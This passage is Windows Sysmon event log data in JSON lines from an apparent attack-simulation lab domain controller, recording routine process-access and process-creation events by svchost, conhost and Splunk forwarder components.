\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4210,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:51.434\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:51.434","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4211,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:51.434\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:51.434","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4212,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:51.434\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:51.434","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4213,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:51.434\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:51.434","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4214,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:51.434\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:51.434","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4215,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:51.434\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02F7-5F25-0000-001089310600}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:51.434","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02F7-5F25-0000-001089310600}","TargetProcessId":"4124","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4216,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:52.966\r\nProcessGuid: {A837DB8D-02F8-5F25-0000-00107E330600}\r\nProcessId: 3384\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:51:52.966","ProcessGuid":"{A837DB8D-02F8-5F25-0000-00107E330600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4217,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:52.966\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-02F8-5F25-0000-00107E330600}\r\nTargetProcessId: 3384\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:52.966","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-02F8-5F25-0000-00107E330600}","TargetProcessId":"3384","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4218,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:52.966\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02F8-5F25-0000-00107E330600}\r\nTargetProcessId: 3384\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 